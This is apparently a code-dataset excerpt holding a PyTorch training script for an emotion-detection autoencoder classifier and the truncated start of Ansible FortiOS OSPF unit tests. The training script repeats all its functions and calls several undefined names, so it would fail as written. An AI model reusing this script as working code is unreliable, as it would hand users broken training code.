| 0
| 0
| 1
| 0
|
0
| 9
|
f7a4d74c3913cf9ab855f803464d38cba66582f0
| 28,868
|
py
|
Python
|
autoencoder/Training.py
|
JosephZheng1998/CNN-Emotion-Detection
|
f56e99103be7a90a52b8ee51c8ae30cdd0051d5c
|
[
"MIT"
] | null | null | null |
autoencoder/Training.py
|
JosephZheng1998/CNN-Emotion-Detection
|
f56e99103be7a90a52b8ee51c8ae30cdd0051d5c
|
[
"MIT"
] | null | null | null |
autoencoder/Training.py
|
JosephZheng1998/CNN-Emotion-Detection
|
f56e99103be7a90a52b8ee51c8ae30cdd0051d5c
|
[
"MIT"
] | null | null | null |
import os
import numpy as np
from PIL import Image
import torch
import torchvision
from torchvision import transforms
import torchvision.models as models
from torchvision.datasets import ImageFolder
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
from torch.utils.data import Dataset, DataLoader, random_split
from sklearn.metrics import roc_auc_score
from IPython.display import Image
from IPython.core.display import Image, display
from torchvision.utils import save_image
import time
import pandas as pd
import matplotlib.pyplot as plt
import random
def preprocessing():
batch_size = 64
train_transform = transforms.Compose([
transforms.RandomRotation(45),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])])
val_transform = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])])
train_dataset = ImageFolder(root='train/', transform=train_transform)
train_loader = DataLoader(train_dataset, batch_size=batch_size, shuffle=True, num_workers=16, pin_memory=True)
dev_dataset = ImageFolder(root='val_test/val/', transform=val_transform)
dev_loader = DataLoader(dev_dataset, batch_size=batch_size, shuffle=False, num_workers=16, pin_memory=True)
test_dataset = ImageFolder(root='val_test/test/', transform=val_transform)
test_loader = DataLoader(test_dataset, batch_size=batch_size, shuffle=False, num_workers=16, pin_memory=True)
print('train dataset: {} images {} classes'.format(len(train_dataset), len(train_dataset.classes)))
print('dev dataset: {} images {} classes'.format(len(dev_dataset), len(dev_dataset.classes)))
print('test dataset: {} images {} classes'.format(len(test_dataset), len(test_dataset.classes)))
return train_loader, dev_loader, test_loader
# train the multitasking model
def train(model, train_loader, val_loader, recon_criterion, class_criterion, optimizer, scheduler, epochs, device):
t_start = time.time()
train_recon_losses = []
train_class_losses = []
train_accs = []
val_class_losses = []
val_recon_losses = []
val_accs = []
for epoch in range(epochs):
model.train()
running_recon_loss = 0
running_class_loss = 0
total = 0
correct = 0
for idx, (images, labels) in enumerate(train_loader):
images, labels = images.to(device), labels.to(device)
optimizer.zero_grad()
features, idx_list = model.encoder.forward(images)
output = model.classifier.forward(features)
recon_images = model.decoder.forward(features, idx_list)
class_loss = class_criterion(output, labels)
recon_loss = recon_criterion(recon_images, images)
total_loss = class_loss + 10*recon_loss
total_loss.backward()
#class_loss.backward()
optimizer.step()
preds = torch.argmax(output, dim=1)
correct += (preds == labels).sum().item()
running_recon_loss += float(recon_loss.item() * images.shape[0])
running_class_loss += float(class_loss.item() * images.shape[0])
total += images.shape[0]
#recon_loss = 0
del images
del labels
del recon_images
del features
del idx_list
del output
del recon_loss
del class_loss
del preds
del total_loss
torch.cuda.empty_cache()
val_class_loss, val_recon_loss, val_acc = validate(model, val_loader, recon_criterion, class_criterion, device)
val_total_loss = val_recon_loss + val_class_loss
train_recon_loss = running_recon_loss/total
train_class_loss = running_class_loss/total
train_total_loss = train_recon_loss + train_class_loss
train_acc = correct/total
train_recon_losses.append(train_recon_loss)
train_class_losses.append(train_class_loss)
train_accs.append(train_acc)
val_class_losses.append(val_class_loss)
val_recon_losses.append(val_recon_loss)
val_accs.append(val_acc)
scheduler.step(val_class_loss)
to_print = "Epoch: {}/{}, Training Time:{:.2f}, Trained Samples: {}/{}, Train Total Loss: {:.5f}, Train Recon Loss: {:.5f}, Train Class Loss: {:.5f} Train Accuracy: {:.5f}, Val Total Loss: {:.5f}, Val Recon Loss: {:.5f}, Val Class Loss: {:.5f}, Val Accuracy: {:.5f}".format(
epoch+1, epochs, time.time()-t_start, total, len(train_loader.dataset), train_total_loss, train_recon_loss, train_class_loss, train_acc,
val_total_loss, val_recon_loss, val_class_loss, val_acc)
print(to_print)
if (epoch+1) % 10 == 0:
saved_model = {
'train_epochs': epoch + 1,
'model': model.state_dict(),
'optimizer': optimizer.state_dict(),
'recon_criterion': recon_criterion.state_dict(),
'class_criterion': class_criterion.state_dict(),
'scheduler': scheduler.state_dict(),
'train_class_losses': train_class_losses,
'train_recon_losses': train_recon_losses,
'train_accuracy': train_accs,
'valid_class_losses': val_class_losses,
'valid_accuracy': val_accs,
'val_recon_losses': val_recon_losses,
}
torch.save(saved_model, 'gdrive/MyDrive/complete_model{}'.format(epoch+1))
return train_recon_losses, train_class_losses, train_accs, val_class_losses, val_recon_losses, val_accs
# validate the multitasking model
def validate(model, val_loader, recon_criterion, class_criterion, device):
model.eval()
correct = 0
total = 0
running_recon_loss = 0
running_class_loss = 0
with torch.no_grad():
for idx, (images, labels) in enumerate(val_loader):
images, labels = images.to(device), labels.to(device)
features, idx_list = model.encoder.forward(images)
output = model.classifier.forward(features)
recon_images = model.decoder.forward(features, idx_list)
class_loss = class_criterion(output, labels)
recon_loss = recon_criterion(recon_images, images)
running_recon_loss += float(recon_loss.item() * labels.shape[0])
running_class_loss += float(class_loss * labels.shape[0])
total += labels.shape[0]
preds = torch.argmax(output, dim=1)
correct += (preds == labels).sum().item()
"""
print(correct)
print(preds)
print(labels)
"""
del images
del labels
del recon_images
del features
del idx_list
del output
del recon_loss
del class_loss
del preds
torch.cuda.empty_cache()
return running_class_loss/total, running_recon_loss/total, correct/total
# only train the autoencoder part of the model
def pretrain(model, train_loader, val_loader, criterion, optimizer, scheduler, epochs, device):
t_start = time.time()
train_recon_losses = []
val_recon_losses = []
for epoch in range(epochs):
model.train()
running_recon_loss = 0
total = 0
for idx, (images, labels) in enumerate(train_loader):
images, labels = images.to(device), labels.to(device)
optimizer.zero_grad()
features, idx_list = model.encoder.forward(images)
recon_images = model.decoder.forward(features, idx_list)
recon_loss = criterion(recon_images, images)
recon_loss.backward()
optimizer.step()
running_recon_loss += float(recon_loss.item() * images.shape[0])
total += images.shape[0]
del images
del labels
del recon_images
del features
del idx_list
del recon_loss
torch.cuda.empty_cache()
val_recon_loss = pre_validate(model, val_loader, criterion, device)
train_recon_loss = running_recon_loss/total
train_recon_losses.append(train_recon_loss)
val_recon_losses.append(val_recon_loss)
scheduler.step(val_recon_loss)
to_print = "Epoch: {}/{}, Training Time:{:.2f}, Trained Samples: {}/{}, Train Recon Loss: {:.5f}, Val Recon Loss: {:.5f}".format(
epoch+1, epochs, time.time()-t_start, total, len(train_loader.dataset), train_recon_loss,
val_recon_loss)
print(to_print)
if epoch % 10 == 0:
saved_model = {
'train_epochs': epoch + 1,
'model': model.state_dict(),
'optimizer': optimizer.state_dict(),
'recon_criterion': criterion.state_dict(),
'scheduler': scheduler.state_dict(),
}
torch.save(saved_model, 'gdrive/MyDrive/pre_model{}'.format(epoch))
return train_recon_losses, val_recon_losses
# only validate the autoencoder part of the model
def pre_validate(model, val_loader, recon_criterion, device):
model.eval()
total = 0
running_recon_loss = 0
with torch.no_grad():
for idx, (images, labels) in enumerate(val_loader):
images, labels = images.to(device), labels.to(device)
features, idx_list = model.encoder.forward(images)
recon_images = model.decoder.forward(features, idx_list)
recon_loss = recon_criterion(recon_images, images)
running_recon_loss += float(recon_loss.item() * labels.shape[0])
total += images.shape[0]
del images
del labels
del recon_images
del features
del idx_list
del recon_loss
torch.cuda.empty_cache()
return running_recon_loss/total
# only train the model's classifier
def train_class(model, train_loader, val_loader, criterion, optimizer, scheduler, epochs, device):
t_start = time.time()
train_class_losses = []
train_accs = []
val_class_losses = []
val_accs = []
for epoch in range(epochs):
model.train()
running_class_loss = 0
total = 0
correct = 0
for idx, (images, labels) in enumerate(train_loader):
images, labels = images.to(device), labels.to(device)
optimizer.zero_grad()
features, idx_list = model.encoder.forward(images)
features = features.detach()
output = model.classifier.forward(features)
class_loss = criterion(output, labels)
class_loss.backward()
optimizer.step()
preds = torch.argmax(output, dim=1)
correct += (preds == labels).sum().item()
running_class_loss += float(class_loss.item() * images.shape[0])
total += images.shape[0]
del images
del labels
del features
del idx_list
del output
del class_loss
del preds
torch.cuda.empty_cache()
val_class_loss, val_acc = validate_class(model, val_loader, criterion, device)
train_class_loss = running_class_loss/total
train_acc = correct/total
train_class_losses.append(train_class_loss)
train_accs.append(train_acc)
val_class_losses.append(val_class_loss)
val_accs.append(val_acc)
scheduler.step(val_class_loss)
to_print = "Epoch: {}/{}, Training Time:{:.2f}, Trained Samples: {}/{}, Train Class Loss: {:.5f} Train Accuracy: {:.5f}, Val Class Loss: {:.5f}, Val Accuracy: {:.5f}".format(
epoch+1, epochs, time.time()-t_start, total, len(train_loader.dataset), train_class_loss, train_acc,
val_class_loss, val_acc)
print(to_print)
if (epoch+1) % 10 == 0:
saved_model = {
'train_epochs': epoch + 1,
'model': model.state_dict(),
'optimizer': optimizer.state_dict(),
'criterion': criterion.state_dict(),
'scheduler': scheduler.state_dict(),
'train_class_losses': train_class_losses,
'train_accuracy': train_accs,
'valid_class_losses': val_class_losses,
'valid_accuracy': val_accs,
}
torch.save(saved_model, 'gdrive/MyDrive/complete_model{}'.format(epoch+1))
return train_class_losses, train_accs, val_class_losses, val_accs
# only validate the model's classifier
def validate_class(model, val_loader, criterion, device):
model.eval()
correct = 0
total = 0
running_class_loss = 0
with torch.no_grad():
for idx, (images, labels) in enumerate(val_loader):
images, labels = images.to(device), labels.to(device)
features, idx_list = model.encoder.forward(images)
features = features.detach()
output = model.classifier.forward(features)
class_loss = class_criterion(output, labels)
running_class_loss += float(class_loss * labels.shape[0])
total += labels.shape[0]
preds = torch.argmax(output, dim=1)
correct += (preds == labels).sum().item()
"""
print(correct)
print(preds)
print(labels)
"""
del images
del labels
del features
del idx_list
del output
del class_loss
del preds
torch.cuda.empty_cache()
return running_class_loss/total, correct/total
"""# Training and Validating Function"""
# train the multitasking model
def train(model, train_loader, val_loader, recon_criterion, class_criterion, optimizer, scheduler, epochs, device):
t_start = time.time()
train_recon_losses = []
train_class_losses = []
train_accs = []
val_class_losses = []
val_recon_losses = []
val_accs = []
for epoch in range(epochs):
model.train()
running_recon_loss = 0
running_class_loss = 0
total = 0
correct = 0
for idx, (images, labels) in enumerate(train_loader):
images, labels = images.to(device), labels.to(device)
optimizer.zero_grad()
features, idx_list = model.encoder.forward(images)
output = model.classifier.forward(features)
recon_images = model.decoder.forward(features, idx_list)
class_loss = class_criterion(output, labels)
recon_loss = recon_criterion(recon_images, images)
total_loss = class_loss + 10*recon_loss
total_loss.backward()
#class_loss.backward()
optimizer.step()
preds = torch.argmax(output, dim=1)
correct += (preds == labels).sum().item()
running_recon_loss += float(recon_loss.item() * images.shape[0])
running_class_loss += float(class_loss.item() * images.shape[0])
total += images.shape[0]
#recon_loss = 0
del images
del labels
del recon_images
del features
del idx_list
del output
del recon_loss
del class_loss
del preds
del total_loss
torch.cuda.empty_cache()
val_class_loss, val_recon_loss, val_acc = validate(model, val_loader, recon_criterion, class_criterion, device)
val_total_loss = val_recon_loss + val_class_loss
train_recon_loss = running_recon_loss/total
train_class_loss = running_class_loss/total
train_total_loss = train_recon_loss + train_class_loss
train_acc = correct/total
train_recon_losses.append(train_recon_loss)
train_class_losses.append(train_class_loss)
train_accs.append(train_acc)
val_class_losses.append(val_class_loss)
val_recon_losses.append(val_recon_loss)
val_accs.append(val_acc)
scheduler.step(val_class_loss)
to_print = "Epoch: {}/{}, Training Time:{:.2f}, Trained Samples: {}/{}, Train Total Loss: {:.5f}, Train Recon Loss: {:.5f}, Train Class Loss: {:.5f} Train Accuracy: {:.5f}, Val Total Loss: {:.5f}, Val Recon Loss: {:.5f}, Val Class Loss: {:.5f}, Val Accuracy: {:.5f}".format(
epoch+1, epochs, time.time()-t_start, total, len(train_loader.dataset), train_total_loss, train_recon_loss, train_class_loss, train_acc,
val_total_loss, val_recon_loss, val_class_loss, val_acc)
print(to_print)
if (epoch+1) % 10 == 0:
saved_model = {
'train_epochs': epoch + 1,
'model': model.state_dict(),
'optimizer': optimizer.state_dict(),
'recon_criterion': recon_criterion.state_dict(),
'class_criterion': class_criterion.state_dict(),
'scheduler': scheduler.state_dict(),
'train_class_losses': train_class_losses,
'train_recon_losses': train_recon_losses,
'train_accuracy': train_accs,
'valid_class_losses': val_class_losses,
'valid_accuracy': val_accs,
'val_recon_losses': val_recon_losses,
}
torch.save(saved_model, 'gdrive/MyDrive/complete_model{}'.format(epoch+1))
return train_recon_losses, train_class_losses, train_accs, val_class_losses, val_recon_losses, val_accs
# validate the multitasking model
def validate(model, val_loader, recon_criterion, class_criterion, device):
model.eval()
correct = 0
total = 0
running_recon_loss = 0
running_class_loss = 0
with torch.no_grad():
for idx, (images, labels) in enumerate(val_loader):
images, labels = images.to(device), labels.to(device)
features, idx_list = model.encoder.forward(images)
output = model.classifier.forward(features)
recon_images = model.decoder.forward(features, idx_list)
class_loss = class_criterion(output, labels)
recon_loss = recon_criterion(recon_images, images)
running_recon_loss += float(recon_loss.item() * labels.shape[0])
running_class_loss += float(class_loss * labels.shape[0])
total += labels.shape[0]
preds = torch.argmax(output, dim=1)
correct += (preds == labels).sum().item()
"""
print(correct)
print(preds)
print(labels)
"""
del images
del labels
del recon_images
del features
del idx_list
del output
del recon_loss
del class_loss
del preds
torch.cuda.empty_cache()
return running_class_loss/total, running_recon_loss/total, correct/total
# only train the autoencoder part of the model
def pretrain(model, train_loader, val_loader, criterion, optimizer, scheduler, epochs, device):
t_start = time.time()
train_recon_losses = []
val_recon_losses = []
for epoch in range(epochs):
model.train()
running_recon_loss = 0
total = 0
for idx, (images, labels) in enumerate(train_loader):
images, labels = images.to(device), labels.to(device)
optimizer.zero_grad()
features, idx_list = model.encoder.forward(images)
recon_images = model.decoder.forward(features, idx_list)
recon_loss = criterion(recon_images, images)
recon_loss.backward()
optimizer.step()
running_recon_loss += float(recon_loss.item() * images.shape[0])
total += images.shape[0]
del images
del labels
del recon_images
del features
del idx_list
del recon_loss
torch.cuda.empty_cache()
val_recon_loss = pre_validate(model, val_loader, criterion, device)
train_recon_loss = running_recon_loss/total
train_recon_losses.append(train_recon_loss)
val_recon_losses.append(val_recon_loss)
scheduler.step(val_recon_loss)
to_print = "Epoch: {}/{}, Training Time:{:.2f}, Trained Samples: {}/{}, Train Recon Loss: {:.5f}, Val Recon Loss: {:.5f}".format(
epoch+1, epochs, time.time()-t_start, total, len(train_loader.dataset), train_recon_loss,
val_recon_loss)
print(to_print)
if epoch % 10 == 0:
saved_model = {
'train_epochs': epoch + 1,
'model': model.state_dict(),
'optimizer': optimizer.state_dict(),
'recon_criterion': criterion.state_dict(),
'scheduler': scheduler.state_dict(),
}
torch.save(saved_model, 'gdrive/MyDrive/pre_model{}'.format(epoch))
return train_recon_losses, val_recon_losses
# only validate the autoencoder part of the model
def pre_validate(model, val_loader, recon_criterion, device):
model.eval()
total = 0
running_recon_loss = 0
with torch.no_grad():
for idx, (images, labels) in enumerate(val_loader):
images, labels = images.to(device), labels.to(device)
features, idx_list = model.encoder.forward(images)
recon_images = model.decoder.forward(features, idx_list)
recon_loss = recon_criterion(recon_images, images)
running_recon_loss += float(recon_loss.item() * labels.shape[0])
total += images.shape[0]
del images
del labels
del recon_images
del features
del idx_list
del recon_loss
torch.cuda.empty_cache()
return running_recon_loss/total
# only train the model's classifier
def train_class(model, train_loader, val_loader, criterion, optimizer, scheduler, epochs, device):
t_start = time.time()
train_class_losses = []
train_accs = []
val_class_losses = []
val_accs = []
for epoch in range(epochs):
model.train()
running_class_loss = 0
total = 0
correct = 0
for idx, (images, labels) in enumerate(train_loader):
images, labels = images.to(device), labels.to(device)
optimizer.zero_grad()
features, idx_list = model.encoder.forward(images)
features = features.detach()
output = model.classifier.forward(features)
class_loss = criterion(output, labels)
class_loss.backward()
optimizer.step()
preds = torch.argmax(output, dim=1)
correct += (preds == labels).sum().item()
running_class_loss += float(class_loss.item() * images.shape[0])
total += images.shape[0]
del images
del labels
del features
del idx_list
del output
del class_loss
del preds
torch.cuda.empty_cache()
val_class_loss, val_acc = validate_class(model, val_loader, criterion, device)
train_class_loss = running_class_loss/total
train_acc = correct/total
train_class_losses.append(train_class_loss)
train_accs.append(train_acc)
val_class_losses.append(val_class_loss)
val_accs.append(val_acc)
scheduler.step(val_class_loss)
to_print = "Epoch: {}/{}, Training Time:{:.2f}, Trained Samples: {}/{}, Train Class Loss: {:.5f} Train Accuracy: {:.5f}, Val Class Loss: {:.5f}, Val Accuracy: {:.5f}".format(
epoch+1, epochs, time.time()-t_start, total, len(train_loader.dataset), train_class_loss, train_acc,
val_class_loss, val_acc)
print(to_print)
if (epoch+1) % 10 == 0:
saved_model = {
'train_epochs': epoch + 1,
'model': model.state_dict(),
'optimizer': optimizer.state_dict(),
'criterion': criterion.state_dict(),
'scheduler': scheduler.state_dict(),
'train_class_losses': train_class_losses,
'train_accuracy': train_accs,
'valid_class_losses': val_class_losses,
'valid_accuracy': val_accs,
}
torch.save(saved_model, 'gdrive/MyDrive/complete_model{}'.format(epoch+1))
return train_class_losses, train_accs, val_class_losses, val_accs
# only validate the model's classifier
def validate_class(model, val_loader, criterion, device):
model.eval()
correct = 0
total = 0
running_class_loss = 0
with torch.no_grad():
for idx, (images, labels) in enumerate(val_loader):
images, labels = images.to(device), labels.to(device)
features, idx_list = model.encoder.forward(images)
features = features.detach()
output = model.classifier.forward(features)
class_loss = class_criterion(output, labels)
running_class_loss += float(class_loss * labels.shape[0])
total += labels.shape[0]
preds = torch.argmax(output, dim=1)
correct += (preds == labels).sum().item()
"""
print(correct)
print(preds)
print(labels)
"""
del images
del labels
del features
del idx_list
del output
del class_loss
del preds
torch.cuda.empty_cache()
return running_class_loss/total, correct/total
if __name__ == '__main__':
splitfolders.ratio('test', output='val_test', seed=1337, ratio=(0, 0.5, 0.5), group_prefix=None)
# check for GPU
cuda = torch.cuda.is_available()
device = torch.device('cuda' if cuda else 'cpu')
print(device)
train_loader, dev_loader, test_loader = preprocessing()
"""# Dimensionality Reduction """
model = AutoClassifier()
model.to(device)
criterion = nn.MSELoss()
epochs = 80
optimizer = torch.optim.Adam(model.parameters(), lr=5e-2)
scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer, factor=0.75, patience=2, verbose=True)
# train the encoder and decoder
pre_train_loss, pre_val_loss = pretrain(model, train_loader, dev_loader, criterion, optimizer, scheduler, epochs, device)
make_plots(pre_train_loss, pre_val_loss, "Autoencoder", "Loss")
#compare the reconstructed image with the original image
fixed_x = train_dataset[random.randint(1,100)][0].unsqueeze(0).to(device)
compare_x = compare(fixed_x)
save_image(compare_x.data.cpu(), 'sample_image.png')
display(Image('sample_image.png', width=700, unconfined=True))
class_criterion = nn.CrossEntropyLoss()
optimizer = torch.optim.Adam(model.parameters(), lr=1e-3)
scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer, factor=0.75, patience=2, verbose=True)
epoch = 80
train_class_losses, train_accs, val_class_losses, val_accs = train_class(model, train_loader, dev_loader, class_criterion, optimizer, scheduler, epochs, device)
make_plots(train_accs, val_accs, "Classifier", "Accuracy")
"""# Train and Test the Multitasking Model"""
model = AutoClassifier()
model.to(device)
recon_criterion = nn.MSELoss()
class_criterion = nn.CrossEntropyLoss()
optimizer = torch.optim.Adam(model.parameters(), lr=1e-3)
scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer, factor=0.75, patience=2, verbose=True)
epochs = 100
train_recon_losses, train_class_losses, train_accs, val_class_losses, val_recon_losses, val_accs = train(model, train_loader, dev_loader, recon_criterion, class_criterion, optimizer, scheduler, epochs, device)
_, _, test_acc = validate(model, test_loader, recon_criterion, class_criterion, device)
| 43.541478
| 282
| 0.607316
| 3,350
| 28,868
| 4.974925
| 0.062687
| 0.050762
| 0.023041
| 0.022681
| 0.904356
| 0.887436
| 0.874715
| 0.866555
| 0.866555
| 0.862715
| 0
| 0.012325
| 0.294548
| 28,868
| 662
| 283
| 43.607251
| 0.80604
| 0.021408
| 0
| 0.889081
| 0
| 0.010399
| 0.074773
| 0.006348
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02253
| false
| 0
| 0.034662
| 0
| 0.079723
| 0.02773
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f7b8565d094a2eb2295d9470ea25d2d3a1bbff33
| 12,710
|
py
|
Python
|
v6.0.5/router/test_fortios_router_ospf.py
|
fortinet-solutions-cse/ansible_fgt_modules
|
c45fba49258d7c9705e7a8fd9c2a09ea4c8a4719
|
[
"Apache-2.0"
] | 14
|
2018-09-25T20:35:25.000Z
|
2021-07-14T04:30:54.000Z
|
v6.0.6/router/test_fortios_router_ospf.py
|
fortinet-solutions-cse/ansible_fgt_modules
|
c45fba49258d7c9705e7a8fd9c2a09ea4c8a4719
|
[
"Apache-2.0"
] | 32
|
2018-10-09T04:13:42.000Z
|
2020-05-11T07:20:28.000Z
|
v6.0.5/router/test_fortios_router_ospf.py
|
fortinet-solutions-cse/ansible_fgt_modules
|
c45fba49258d7c9705e7a8fd9c2a09ea4c8a4719
|
[
"Apache-2.0"
] | 11
|
2018-10-09T00:14:53.000Z
|
2021-11-03T10:54:09.000Z
|
# Copyright 2019 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <https://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
import pytest
from mock import ANY
from ansible.module_utils.network.fortios.fortios import FortiOSHandler
try:
from ansible.modules.network.fortios import fortios_router_ospf
except ImportError:
pytest.skip("Could not load required modules for testing", allow_module_level=True)
@pytest.fixture(autouse=True)
def connection_mock(mocker):
connection_class_mock = mocker.patch('ansible.modules.network.fortios.fortios_router_ospf.Connection')
return connection_class_mock
fos_instance = FortiOSHandler(connection_mock)
def test_router_ospf_creation(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'router_ospf': {
'abr_type': 'cisco',
'auto_cost_ref_bandwidth': '4',
'bfd': 'enable',
'database_overflow': 'enable',
'database_overflow_max_lsas': '7',
'database_overflow_time_to_recover': '8',
'default_information_metric': '9',
'default_information_metric_type': '1',
'default_information_originate': 'enable',
'default_information_route_map': 'test_value_12',
'default_metric': '13',
'distance': '14',
'distance_external': '15',
'distance_inter_area': '16',
'distance_intra_area': '17',
'distribute_list_in': 'test_value_18',
'distribute_route_map_in': 'test_value_19',
'log_neighbour_changes': 'enable',
'restart_mode': 'none',
'restart_period': '22',
'rfc1583_compatible': 'enable',
'router_id': 'test_value_24',
'spf_timers': 'test_value_25',
},
'vdom': 'root'}
is_error, changed, response = fortios_router_ospf.fortios_router(input_data, fos_instance)
expected_data = {
'abr-type': 'cisco',
'auto-cost-ref-bandwidth': '4',
'bfd': 'enable',
'database-overflow': 'enable',
'database-overflow-max-lsas': '7',
'database-overflow-time-to-recover': '8',
'default-information-metric': '9',
'default-information-metric-type': '1',
'default-information-originate': 'enable',
'default-information-route-map': 'test_value_12',
'default-metric': '13',
'distance': '14',
'distance-external': '15',
'distance-inter-area': '16',
'distance-intra-area': '17',
'distribute-list-in': 'test_value_18',
'distribute-route-map-in': 'test_value_19',
'log-neighbour-changes': 'enable',
'restart-mode': 'none',
'restart-period': '22',
'rfc1583-compatible': 'enable',
'router-id': 'test_value_24',
'spf-timers': 'test_value_25',
}
set_method_mock.assert_called_with('router', 'ospf', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
def test_router_ospf_creation_fails(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'error', 'http_method': 'POST', 'http_status': 500}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'router_ospf': {
'abr_type': 'cisco',
'auto_cost_ref_bandwidth': '4',
'bfd': 'enable',
'database_overflow': 'enable',
'database_overflow_max_lsas': '7',
'database_overflow_time_to_recover': '8',
'default_information_metric': '9',
'default_information_metric_type': '1',
'default_information_originate': 'enable',
'default_information_route_map': 'test_value_12',
'default_metric': '13',
'distance': '14',
'distance_external': '15',
'distance_inter_area': '16',
'distance_intra_area': '17',
'distribute_list_in': 'test_value_18',
'distribute_route_map_in': 'test_value_19',
'log_neighbour_changes': 'enable',
'restart_mode': 'none',
'restart_period': '22',
'rfc1583_compatible': 'enable',
'router_id': 'test_value_24',
'spf_timers': 'test_value_25',
},
'vdom': 'root'}
is_error, changed, response = fortios_router_ospf.fortios_router(input_data, fos_instance)
expected_data = {
'abr-type': 'cisco',
'auto-cost-ref-bandwidth': '4',
'bfd': 'enable',
'database-overflow': 'enable',
'database-overflow-max-lsas': '7',
'database-overflow-time-to-recover': '8',
'default-information-metric': '9',
'default-information-metric-type': '1',
'default-information-originate': 'enable',
'default-information-route-map': 'test_value_12',
'default-metric': '13',
'distance': '14',
'distance-external': '15',
'distance-inter-area': '16',
'distance-intra-area': '17',
'distribute-list-in': 'test_value_18',
'distribute-route-map-in': 'test_value_19',
'log-neighbour-changes': 'enable',
'restart-mode': 'none',
'restart-period': '22',
'rfc1583-compatible': 'enable',
'router-id': 'test_value_24',
'spf-timers': 'test_value_25',
}
set_method_mock.assert_called_with('router', 'ospf', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 500
def test_router_ospf_idempotent(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'error', 'http_method': 'DELETE', 'http_status': 404}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'router_ospf': {
'abr_type': 'cisco',
'auto_cost_ref_bandwidth': '4',
'bfd': 'enable',
'database_overflow': 'enable',
'database_overflow_max_lsas': '7',
'database_overflow_time_to_recover': '8',
'default_information_metric': '9',
'default_information_metric_type': '1',
'default_information_originate': 'enable',
'default_information_route_map': 'test_value_12',
'default_metric': '13',
'distance': '14',
'distance_external': '15',
'distance_inter_area': '16',
'distance_intra_area': '17',
'distribute_list_in': 'test_value_18',
'distribute_route_map_in': 'test_value_19',
'log_neighbour_changes': 'enable',
'restart_mode': 'none',
'restart_period': '22',
'rfc1583_compatible': 'enable',
'router_id': 'test_value_24',
'spf_timers': 'test_value_25',
},
'vdom': 'root'}
is_error, changed, response = fortios_router_ospf.fortios_router(input_data, fos_instance)
expected_data = {
'abr-type': 'cisco',
'auto-cost-ref-bandwidth': '4',
'bfd': 'enable',
'database-overflow': 'enable',
'database-overflow-max-lsas': '7',
'database-overflow-time-to-recover': '8',
'default-information-metric': '9',
'default-information-metric-type': '1',
'default-information-originate': 'enable',
'default-information-route-map': 'test_value_12',
'default-metric': '13',
'distance': '14',
'distance-external': '15',
'distance-inter-area': '16',
'distance-intra-area': '17',
'distribute-list-in': 'test_value_18',
'distribute-route-map-in': 'test_value_19',
'log-neighbour-changes': 'enable',
'restart-mode': 'none',
'restart-period': '22',
'rfc1583-compatible': 'enable',
'router-id': 'test_value_24',
'spf-timers': 'test_value_25',
}
set_method_mock.assert_called_with('router', 'ospf', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 404
def test_router_ospf_filter_foreign_attributes(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'router_ospf': {
'random_attribute_not_valid': 'tag',
'abr_type': 'cisco',
'auto_cost_ref_bandwidth': '4',
'bfd': 'enable',
'database_overflow': 'enable',
'database_overflow_max_lsas': '7',
'database_overflow_time_to_recover': '8',
'default_information_metric': '9',
'default_information_metric_type': '1',
'default_information_originate': 'enable',
'default_information_route_map': 'test_value_12',
'default_metric': '13',
'distance': '14',
'distance_external': '15',
'distance_inter_area': '16',
'distance_intra_area': '17',
'distribute_list_in': 'test_value_18',
'distribute_route_map_in': 'test_value_19',
'log_neighbour_changes': 'enable',
'restart_mode': 'none',
'restart_period': '22',
'rfc1583_compatible': 'enable',
'router_id': 'test_value_24',
'spf_timers': 'test_value_25',
},
'vdom': 'root'}
is_error, changed, response = fortios_router_ospf.fortios_router(input_data, fos_instance)
expected_data = {
'abr-type': 'cisco',
